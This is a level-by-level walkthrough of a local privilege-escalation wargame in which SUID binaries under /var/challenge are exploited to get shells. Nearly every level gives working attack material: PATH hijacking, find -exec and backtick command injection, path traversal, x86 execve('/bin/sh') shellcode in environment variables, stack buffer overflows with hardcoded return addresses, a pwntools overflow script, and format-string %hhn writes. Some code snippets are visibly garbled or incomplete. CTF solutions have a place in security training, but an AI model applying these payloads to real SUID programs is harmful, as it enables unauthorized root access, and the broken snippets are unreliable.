All challenges are under /var/challenge/levelN, where N is the number of level that starts from 1. All challenge binaries are SUID programs. Your goal is to run each challenge binary, exploit it, get a shell, and then execute l33t to elevate you onto the next level. You must start from level 1.

//level1 exploit Cd to /var/challenge/level1 and run the next command export HOME="/var/challenge/level1" You get a bash shell $ Run l33t and move to level2

//level2 exploit Create a file called tidy Then change the Path variable to your documentary PATH=/home/gooner:$PATH Change permission for tidy using chmod +x tidy In tidy have l33t and save the file Then from /var/challenge/level2 run ./2 /home/gooner/tidy The output should say OK! Move to challenge 3

//level3 exploit #!/bin/bash /var/challenge/level3/3 'level3.sh -exec l33t {} +' Use this in a script and run the file ./file_name

//level4 exploit #!/bin/bash /var/challenge/level4/4 '../../../../../usr/local/bin/l33t' Use this in a script and run the file ./file_name

//level5 exploit Run this command export SHELLCODE=$(python -c 'print "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"')

Create a file in default location with this code #include <stdio.h> #include <stdlib.h>

int main(int argc, char argv[]) { char ptr = getenv("SHELLCODE"); printf("%p\n", ptr); }

compile it using gcc -m32 filename.c -o output

run ./output (an address will get generated 0x...) and copy the address.

Then go to level5 and Run ./5 11

//level 6 exploit Run this command from level6 ./6 uniq $(python -c 'print "A"*256 + "l33t"') Moves to next level

//level7 exploit Create a file called ls in default location Then change the Path variable to your documentary export PATH=/home/gooner:$PATH Change permission for ls using chmod +x ls In ls have l33t and save the file Then from /var/challenge/level7 run ./7 7.cmd The output should list all the files! Move to challenge 8

//level8 exploit Run the following command from /home/gooner export SHELLCODE=$(python -c 'print "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"') Create a python file in default location with the following code from pwn import * fill_len = 0x10004+4 target = 0xffffd140

p = process(argv=['/var/challenge/level8/8', '-p', '2020']) # Uses TCP by default c = remote('127.0.0.1', 2020)

print c.readuntil('Ready to read!') c.send('A'*fill_len + p32(target) + '\n') c.readuntil('Done!') c.sendline('l33t; touch success;') print c.recvall(timeout=2)

Run the python file. Move to level9

//level9 exploit Create a python file in default location Have the data as follows #!/usr/bin/env python from pwn import * code = 'kJCQ'341 code=code+'k'+'Lv/L3NowesIU2gvYmluieMxyTHSMcCwC82AicOwAc2A6/4=' sc = base64.b64decode(code) env={} env['__SC'] = sc for i in range(5): env[chr(ord('A')+i)(19)] = p32(0xffffdc01)*2 p = process(executable='/var/challenge/level9/9', argv=[], env=env) p.sendline("l33t;exit") print p.recvall()

Run the file and move to level 10

//level10 exploit Run the following command from default location export SHELLCODE=$(python -c 'print"\x90"*1000 + "\x31\xc0\x50\x68\x6c\x33\x33\x74\x68\x62\x69\x6e\x2f\x68\x63\x61\x6c\x2f\x68\x72\x2f\x6c\x6f\x68\x2f\x2f\x75\x73\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80"') Go to /var/challenge/level10 and run ./10 $(python -c"print 'a'*512") $(python -c "print'b'*8 + '\x55\xd7\xff\xff'")

//level11 exploit Run the following code from default location export SHELLCODE=$(python -c 'print"\x90"*1000 + "\x31\xc0\x50\x68\x6c\x33\x33\x74\x68\x62\x69\x6e\x2f\x68\x63\x61\x6c\x2f\x68\x72\x2f\x6c\x6f\x68\x2f\x2f\x75\x73\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80"')

Create a file level11.sh in default location with data #!/bin/bash /var/challenge/level11/11 python -c 'print "B"*270+"\xe8\xd6\xff\xff"+"A"*32768' abc

Give permissions and make it executable chmod +x level11.sh Run level11.sh to move to level12

//level12 exploit Run from default location export SHELLCODE=$(python -c 'print "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"')

Then from /var/challenge/level12 ./12 python -c 'print "aa\xeb\x9b\x04\x08\xea\x9b\x04\x08\xe9\x9b\x04\x08\xe8\x9b\x04\x08"+"%231x%70\$hhn%255x%71\$hhn%71\$hhn"'

//level13 Run from default location Shell

Have a bash file called level13.sh and make it executable and have the following contents #!/bin/bash export SHELLCODE=$(python -c 'print "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"') /var/challenge/level13/13 gooner python -c 'print "\xe8\xd6\xff\xff"*64'

Run From /var/challenges/level13 /home/gooner/level13.sh

//level14 export SHELLCODE=$(python -c 'print "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"')

Create shell_open.sh file with the following contents and make it executable #!/bin/bash l33t

Create level14.sh file and have the following contents #!/bin/bash export SHELLCODE=$(python -c 'print "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"')

/var/challenge/level14/14 moresecrets shell_open & sleep 1 sh -c "find ~ -group lev15 -name ".*" '`l33t`'"

From default location run ./level14.sh Move to level 15